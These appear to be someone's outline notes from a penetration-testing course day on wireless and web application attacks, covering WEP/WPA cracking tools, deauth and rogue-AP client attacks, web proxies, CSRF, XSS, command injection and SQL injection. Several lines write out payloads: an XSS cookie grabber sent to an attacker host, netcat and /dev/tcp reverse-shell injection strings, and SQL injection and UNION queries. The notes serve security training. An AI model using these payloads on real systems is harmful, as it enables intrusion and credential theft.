- 560.5
- Day 5: Wireless and Web Apps
- wireless
- Overview
- vuln categories
- DoS
- very easy
- RF jamming (illegal - be careful)
- de-authenticate clients
void11 tool
by Reyk Floeter
- rogue access points
- low security on APs
- traffic capture/intercept
- crypto attacks
- hard math
- we never attack cry, we attack the implementation
- client-duping
- which wireless card?
- RA USB
- Atheros-based with madwifi drivers
- MACs have ath
- you may need a couple of different ones
- GPS receivers
- very helpful as well
- make sure compatible with GPSd
- GlobalSat BU-353 for instance
- one channel at a time
- make a USB squid
- 14 channels?
- there's other things to hack
- bluetooth
- RFID
- antenna
- omni
- directional
- must have one of each type
chris supply, rapid city SD- connectors
- "RP" = reverse polarity
- correct impedence
- SMA
- N
- U.FL
- make sure cable is as short as possible
- channels
- for "n" support you need a card that supports it
- 2.4Ghz
- betw 2.4 and 2.483 GHz
- 22 Mhz wide
- 5 Mz apart
- therefore 5 channel separation is needed
- Different sets of channels for different countries
- US 1-11
- Japan 1-14
- Europe 1-13
- France 10-13
- SSIDs
- SSID
- wireless network name
- BSSID
- MAC of the AP
- ESSID
- extended SSID for sharing among multiple APs in the hotel
- roaming support
- record the BSSID you gain access through
- Authentication
- 802.11 handshakes
- probe req
- probe resp
- auth req
- (auth chall)
- (auth resp)
- auth success
- assoc req
- assoc resp
- data
- MS has now fixed so that we don't probe for all APs in list, only the ones we see beacons from
- When we are trying to pentest, how do we know it's the cust's AP we are seeing?
- Wireless discovery and sniffing
- Wireline-side
- AP fingerprinting
- Nessus
- very effective
- plugin 11026
- NMAP
- MAC address
- OUI
- IEEE OUI list
- g darknet for Windows MAC address changer
- Irongeek's MADMACs
- SNMP
- mgt interface
- Wireless-side
- sniff to find clients and APs both
- Upgrade to Kismet newcore
- MAC and SSID in cleartext
- wildpackets.com airopeek
- Wireless interface modes
- same chip is used for AP and adapter, so all modes are there
- master
- AP
- managed
- client connected to AP
- can be used for sniffing
- "Ethernet compatibility mode"
- wireless header scraped off
- compromise clients
- netstumbler runs this way
- ad-hoc
- "free wireless access"
- user joins
- attacked by bot and work on the system
- next time they boot they become free wireless internet
- Josh Wright script sends "all your base" popup to all
- monitor
- aka RFMON
- hard to do in Windows
- passively send all traffic to the OS
- No IP address
- grab raw wireless frames
- Kismet runs this way
- Mode support
- omnipeek does monitor mode
- commercial airpcap
- www.cacetech.com
- awesome
- Linux for free tools
- Now VMware wksta 6, can put a USB wifi interface into monitor mode
See wireless card list on Backtrack website- airodump.net
- wireless card comparisons
- RAUSB from Hawking Technologies
- has external antenna
- Cheaper cards often work better: open source people like cheap
- Linux
- iwconfig
- see which interfaces are wireless
- ifconfig eth1 up
- iwconfig eth1 mode monitor mode channel 6
- tcpdump -i eth1
- wireshark too
- Kismet
- newcore
- more of an active tool
- josh wright
- willhackforsushi.com
- has info on newcore
- crack WEP without aircrack-ng
- sniff DECT (phones of some type (?))
- ZigBee
- another wireless protocol with more range
- used in security cameras
- power plants
- windmills
- run from Backtrack
- bring interface up before starting Kismet
- multiple cards simultaneously
- then compile from C and install
- features
- strip off wireless headers, look at ethernet frames
- monitors CDP traffic
- records location from GPS
- Kismet IDS
- signatures
- probe no join
- Netsumbler in use
- channel change detection
- broadcast deassoc or deauth
- deauth flood
- Finding APs
- Wireline detection
- pull MACs off CAM table to find them
- Signal-to-noise
- difficult because of reflection
- stronger signals in corners
- via probe requests
- Bigger and better isn't an advantage
- you'll only see the closer APs with a bad receiver
- Cain wireless
- uses active approach by default
- Netstumbler
- graph signal-to-noise
- Aruba
- good product
- very nasty
- DoS
- SSID cloaking
- ESSID not sent in beacons
- Cain or Netstumbler can't see them
- If you deauth them
- they are forced to reauth
- ESSID is sent in cleartext in probe requests
- airjack
- see slide 35
- Crypto attacks
- 802.11 privacy bit
- aka "WEP bit"
- not always set even when WEP in use
- could be WPA etc.
- Kismet fuzzy crypto detection
- 0xAA 0xAA is always start of an encrypted packet
- histogram of ciphertext is flat
- WEP
- 64bit ot 128bit
- APs often
- use 64bit twice
- pad with 64 0s
- IV unique for every packet
- should be but not always
- weaknesses
- cleartext IVs
- colliding IVs
- 16 Million IVs
- 24 bits long
- birthday paradox: 4823 packets == 50% chance of collision
- some APs cycle through a canned list (again, when rebooted)
- certain packets are known payload
- CDP
- PING
- ARP
- see slide 47
- identify (guess) packet type
- PING packet always same size
- no replay protection: no temporality
- weak integrity check
- CRC32 calculated from plaintext
- easy to craft a packet with same CRC32
- since no temporality, we can inject more traffic
- more IVs
- more packets cracked
- FMS attack
- Requires 75k-250k WEP packets
- PTW attack
- used in aircrack-ng
- WEPattack
- airsnort
- OLD
- WEPwedgie
- WPA
- better than WEP, but still not secure
- part of 802.11i
- 802.11i effectively deprecated WEP
- uses TKIP
- can use PEAP
- see freeradius-WPE article on josh wright's site
- WPA2 came first, then WPA1
- too much CPU needed for WPA2
- WPA1 uses RC4 not AES as core cipher
morning break- bagels
- assorted creamcheeses
- tools
- cowpatty
- josh wright's tool
- for attacking WPA-PSK
- pyrit
- faster than cowpatty
- uses graphics card
- certain cards
- graphics card is quickest CPU for cracking
- uses cowpatty code
- code.google.com/p/pyrit
exercise using cowpatty- crack WEP
- method
- iwconfig eth1 mode monitor channel 6
- tcpdump -nni eth1 -s0 -w wep_crack.pcap
- crack WPA
- wireless client attacks
- Client attacks
- hijack existing session
- difficult
- force client to associate with us
- airpwn
- airpwn.sourceforge.net
- sees http request to (anyone)
- immediately responds with is own page
- page may include exploit
- airjack
- deauth to make client deassoc
- michael lynn
- /sourceforge.net/projects/airjack
- ESSID-jack grabs the SSID
- monkeyjack
- advantage; can be very selective which MAC addr to attack
- 1. send deauth and sniff
- 2. client tries to reauth
- 3. respond as AP on different channel
- must be closer to victim than AP (timing)
- signal strength helps too
- 4. client assoc with attacker
- 5. attacker is MITM
- karma
- Dino Dai Zovi and K2
- operation
- your system tries to connect to preferred AP
- Karma says "that's me!"
- fake services then interact with client
- can harvest passwords
- not whole MITM because no full Internet access
- not used anymore: see metasploit
- called karmetsploit or karmasploit
- slide 72
- MS does not probe so this makes it much less effective
- chaka khan
- metasploit module
- by josh
- to get around Windows recently now no longer probing for nonbeaconing networks
- start beaconing all the commonly-used AP names
- other SANS classes involving wireless
- 519
- 542
- Web app overview
- defined
- gather info
- nikto
- "klattu barada nikto" makes the robot stop
- (btw, Nessus is a charater in Ringworld)
- movie "The Day the Earth Stood Still"
- by Sullo
- written because frustrated by Whisker (RFP (Rain Forest Puppy))
- www.cirt.net
- nikto looks for
- well-known vulns
- version-specific problems in over 250 webserver types
- misconfigurations of webserver
- unpatched webserver software
- over 3500 known flawed scripts
- example code
- commonly used components of web apps
- other CGI, PHP, ASP. etc.
- exam question: nikto does look for XSS
- Does not look for XSS in custom applications
- Looks for attacks in well-known scripts only, not custom apps
- most checks just look for certain version numbers of given programs
- ./nikto.pl update
- to prep with latest updates
- could be some new tests in there that cause problems for targets
- ./nikto.pl -h [target]
- options
- -p {portnum}
- -output {filename}
- -Format (format:csv,htm,txt,etc.) (txt is default)
- -Single to create custom http request
- -vhost [host_header] to test a certain virtual host
- can focus the test using -T #
- focus on specific categories
- see slide 82
- DoS does not launch a DoS attack, just checks for certain scripts and software versions
- nikto exercise slide 85
- # cd /home/tools/nikto-[version]
- how do you recreate a nikto finding?
- could be combination of a verb and a GET request
- wikto
- by Sensepost
- free
- port of nikto to MS .NET framework
- adds googlehacking using Johnny Long's GHDB
- acunetix
- favorite tool of J Strand
- lists all injection points on each page
- Paros proxy
- www.parosproxy.org
- We wrote a program called "Paros" for people who need to evaluate the security of their web applications. It is free of charge and completely written in Java. Through Paros's proxy nature, all HTTP and HTTPS data between server and client, including cookies and form fields, can be intercepted and modified
- very commonly used tool
- # cd /home/tools/paros
- # java -jar paros.jar
- purpose
- inspect, trap, and edit HTTP requests and responses
- trap a request, modify
- trap a response, modify
- remembers all of the pages accessed
- "sites" part of GUI
- remembers all HTTP requests and responses
- for later analysis
- common uses
- modify cookies
- masquerade as a different session
- look at GET request in "trap" tab and edit cookie there before sending request
- spider entire page
- do offline analysis on airplane
- HTTP request editor
- one-shot requests
- has a scanner
- spider the site
- find certain SQL injection and XSS vulns
- find example files, etc.
- "scanning policy" refers to set of plugins
- encoding and hash calculator
- codes that might be used in a session
- URL encoding
- SHA-1
- Base64
- MD5
- try p@assword, encode the string, then grep for it in web session pcap
- security
- configure auth info to be used
- basic auth or NTLM
- support client side certs
- supports SSL to server and to browser
- Lots of other proxies, slide 94
- odysseus/telemachus
- good graphical representation of requests and responses
- fiddler
- amazing tool for request and response analysis
- achilles
- old but easy to use
- interactive TCP relay
- can trap any TCP-based exchange, not just HTTP/HTTPS.
- ITR
- imperva
- webscarab
- OWASP
- solid, frequently updated
- SPI dynamics SPIProxy/WebInspect
- not free
- Exercise: Paros
- Break for lunch
- cobb salad at Cosi
- Injection attacks
- reflect stuff back to browser
- send cmds to web server
- XSRF and XSS
- related, but not the same
- XSRF - attacker injects HTML (not a script) on a website to make victim's browser do function on another target site
- XSS - attacker injects a script on a website that runs on victim's browser
- CSRF attacks
- cross-site request forgery
- XSRF = CSRF
- to use, you need to understand the web app logic flow and syntax, therefore no fully-automated tools.
- principle
- your browser trusts things that come from webserver.
- With CSRF, webserver trusts browser and does what the browser asks.
- example
- Victim authenticates to bank.com
- bank.com sends session cookie to authenticated user
- browser stores cookie
- cookie is sent to bank.com when victim performs a transaction
- Seperately, victim gets an email, "visit my blog"
- (or, victim visits attacker-controlled site for some other reason)
- avatar - little picture
- could be img tag
- img loads from another site
- img is really a URL that points to bank.com and is a valid transaction request
- <img src="http://bank.com/transfer.php?acct=2383834">
- works over https!
- most CSRF use GET requests
- possible to do it with a POST too
- ways to prevent:
- captcha for serious transactions
- "are you sure?" from bank.com
- update a special value on browser with evey stage of transaction. attacker does not know value so can't forge request
- browser may have some XSRF protection (but it's not the browser's fault)
- exercise slide 112
- account at Bank, we xfer $500 to learn app flow
- goal: get $1MM
- XSS
- Browser exploitation framework
- Wade Aldorf
- BeeF
- goals
- <script>alert("XSS!");</script>
- entered into form
- popups to gather credentials
- XSS to steal cookies
- <script>document.location=http://attackerip/cgi-bin/grab.cgi?'+document.cookie;</script>
- attacker listens on port 80, using netcat perhaps
- XSS to attack internal systems
- jitko
- by Billy Hoffman
- note spelling!
- a series of browser scripts
- makes the browser scan other websites for vulns, like Nikto does
- see slide 127
- Dan Kaminsky
- showed how browser scripts could access any TCP-based local service
- XSS to exploit admin apps
- web-based admin interfaces
- Cisco MARS
- Juniper Netscreen
- etc.
- put the attack in the log
- when admin views log, XSS!
- attacks
- reflected
- give user a snippet including js which will be sent to www server then reflected to browser and executed
- aka "reflected code attacks"
- timeline
- victim is logged onto bank, which has vulnerable server
- victim gets email, subject "Layoffs"
- victim clicks on link in email
- victim's browser sends script to vulnerable server
- vulnerable server reflects link back
- browser executes script (because it came from trusted server), dumps cookies or whatever
- stored
- compromise remote computer system, put script there
or, place script in legit banner ad- doubleclick
- google adsense
- combine with DNS cache snooping to pick oft-visited target sites for placing ad
- robert hansen
- "arsenic"
- ha.ckers.org
- discusses XSS encoding
- XSS exercise slide 136
- Paros automated scanning for XSS
- Posting the blog from the hijacked session did not work for me. Must try again later.
- Command injections
- to know if you can run a command
- non-blind
- have command make a change on a webpage
- see the change
- blind
- send a ping command
- see if you get pinged
- force a DNS lookup
- see if reply is in cache
- in form:
- test; ping -c 3 10.10.10.2; echo
- blind to install netcat backdoor
- have client connect to attacker's ready nc listener
- most firewalls allow outbound connections
- use port 80 or 443, say
- in form:
- test; /usr/local/bin/nc 10.10.75.2 -p 443; echo
- set up attacker server:
- nc -n -v -l -p 443
- in form:
- /bin/bash -i > /dev/tcp/10.10.75.2/443 0<%1
- cmd injection exercise slide 155
- what can you do on a system as the apache user?
- write/read files
- interact with the db
- inspect processes
- pivot using an outbound connection
- what else?
- run fgdump though it to compromise Windows systems on the other side
- SQL injection
- web app formulates SQL queries based on user input
- form variables
- cookies
- hidden forms
- variables in GET
- user inputs an sku in a web form.
- select * from inventory where sku='[input]'
- 1. get db to return an error
- injection flaws
- enter a tick into a form
- learn from error what kind of db it is
- Quotation marks terminate strings in SQL
- Try:
- '
- *
- "
- `
- 2. determine db structure
- sometimes very hard
- sometimes its a canned app so you know what the structure is
- SQL language
- On different db software
- different syntax
- different config tables
- useful statements
- select [cols] from [table] where [criteria]
- stay away from update, drop, etc. (DDL)
- see slide 168
- ' or 1=1;--
- " or 1=1
- ' or 'a'a = 'a
- ') or '(a'='a
- select * from inventory where sku='' or 1=1;--'
- may dump entire table
- the semicolon
- for multiple statements or queries on one line
- '; select * from users where 1=1;--
- UNION
- select * from inventory where sku='' UNION select * from users where 1=1;--'
- may respond with whole inventory table and then whole users table as one big table
- number of cols and data type must be same for both sides of UNION
- Query the db for its structure
- slide 170
- MSSQL
- select name from master..sysobjects where type ='U';
- select top 1 table_name from information_schema.tables;
- Oracle
- select table_name from user_tables;
- MySQL
- select table_schema,table_name from information_schema.tables;
Put in honeytables and detect any access- Injection cheatsheet at http://pentestmonkey.net
- Blind SQL injection
- enumerate data by asking yes or no questions
- absinth tool
- by Nummish and Xeon
- very noisy
- www.0x90.org
- core impact concept
- give you a SQL prompt
- take your command as typed and do it for you somehow
- SQLMAP does same thing for free
- exercise: SQL injection p. 175
- Maltego
- informal, quick tour
- good one in Backtrack4
- Drag and drop person over
- edit thename
- rt click, properties
- websites associated with person
- email addresses associated (or not?)
- www.john-strand.com
- Assoc. with Denver Univ.
- pipl.com
- great website
- search for people
- smugmug.com
